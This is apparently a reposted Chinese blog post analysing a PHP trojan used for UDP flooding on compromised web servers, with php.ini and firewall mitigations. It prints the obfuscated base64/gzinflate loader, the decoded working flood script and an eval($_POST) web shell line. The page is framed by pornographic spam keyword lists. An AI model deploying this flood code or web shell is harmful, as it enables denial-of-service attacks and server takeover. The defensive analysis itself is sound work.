日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程语言 > php >内容正文

php

udp攻击的PHP木马

發(fā)布時(shí)間:2024/3/12 php 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 udp攻击的PHP木马 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
關(guān)于近期一些服務(wù)器遭受UDP攻擊的說明
近來我有一兩臺服務(wù)器顯示經(jīng)常受到udp攻擊
導(dǎo)致服務(wù)器帶寬占用到100%,用華盾查流量占用也無法查到具體是哪個站被攻擊了,起初以為是cc攻擊,因?yàn)橥V沽薸is帶寬就為0了,其實(shí)不然,都是部分用戶被入侵導(dǎo)致的
下面我想說一下被入侵的原理
用戶程序中的一個php頁面的原代碼:
<?php
/*
gl

*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
經(jīng)過N次解密后的代碼:
<?php


$packets = 0;
$
ip = $_GET[/'ip/'];
$
rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[/'time/'];

$time = time();
print /"Flooded: $ip on port $rand <br><br>/";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp =
fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>
<?php eval($_POST[ddos])?>
baidu了一下工作原理:
先把你代碼放到一個正常的網(wǎng)頁中.
通過url傳遞IP和端口以udp的方式打開.傳遞文件到服務(wù)器寫出.
這樣服務(wù)器就中招了.
也就是服務(wù)器顯示udp攻擊,帶寬占用非常之嚴(yán)重,基本是100%,一般徘徊在97%-99%之間

解決方案:
在php.ini中限制php用網(wǎng)絡(luò)。
在php.ini里設(shè)其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號一定要有,意思就是限制用sockets.dll
然后重啟IIS

我沒關(guān)這個函數(shù),有的程序需要貌似,直接把udp出站端口給封了

總結(jié)

以上是生活随笔為你收集整理的udp攻击的PHP木马的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 一个人看的www片免费高清中文 | 亚洲精品免费在线观看视频 | 538国产精品视频一区二区 | 久久精品网址 | 亚洲亚洲人成综合网络 | 欧美综合区 | 精品久久久久久久久久久久久久 | 亚洲乱仑 | 欧美精品一 | 国产精品无码毛片 | 国产精品伦一区二区三级视频 | 久久免费在线观看 | 深夜福利一区 | 欧美在线视频精品 | 吻胸摸激情床激烈视频 | 亚洲va在线| 国产精品一区二区三区四区视频 | 国产理论 | 亚洲成年网站 | 理论片中文 | 欧美久久综合网 | 一本一道久久 | 精品午夜福利在线观看 | 成人国产精品免费观看视频 | 国产精品视频一二三区 | 男生和女生差差的视频 | 日韩成人综合 | 善良的女邻居在线观看 | 天天看av| 少妇太爽了在线观看 | 嫩草视频一区二区三区 | 亚洲国产成人va在线观看天堂 | 国产成年人视频 | 亚洲美女偷拍 | 大地资源二中文在线影视免费观看 | 天天干网站 | 日本污视频在线观看 | 免费看91视频 | 日批免费看 | 日本免费不卡一区二区 | 精品国产一区二区三区四 | 天天操天天干天天爽 | 美女脱了裤子让男人桶 | 免费成人深夜夜视频 | 女生扒开尿口让男生桶 | av在线播放网 | 水多多在线 | 成人一区二区三区视频 | 欧美日韩国产成人精品 | 久久高清精品 | 长篇高h乱肉辣文 | 新x8x8拨牐拨牐永久免费影库 | 一级大片儿 | 国产免费av一区二区三区 | 日本 在线 | 草碰在线 | 韩日av一区二区 | 亚洲欧美一区二区三区四区 | 国产www免费观看 | 一区两区小视频 | 亚洲精品理论片 | 久久人妻无码aⅴ毛片a片app | 99自拍视频在线观看 | 国产亚洲欧美一区 | 琪琪五月天 | 大色综合 | 色综合天天综合网国产成人网 | 黄色日韩 | 久久久久久视 | 日韩一区av在线 | 天堂亚洲精品 | av影院在线观看 | 欧美一级专区免费大片 | 国产欧美一区二区三区在线看 | 97人人干 | 日韩一区二区三区视频在线 | 久久女同互慰一区二区三区 | 欧美怡红院视频一区二区三区 | 操比网站 | 色吧久久 | 成人免费做受小说 | 亚洲啪啪免费视频 | 国产一区二区三区免费在线观看 | 99视频观看 | 在线看免费| 三级黄色网络 | 日韩涩 | 少妇激情一区二区三区视频 | 欧美熟妇7777一区二区 | 国产精品色图 | 特一级黄色大片 | 噜噜色av | 欧美成人福利 | 咪咪色图| 成人免费观看网址 | 国产亚洲欧美日韩精品 | 噼里啪啦动漫高清在线观看 | 日韩在线www | 最近中文字幕免费mv视频7 |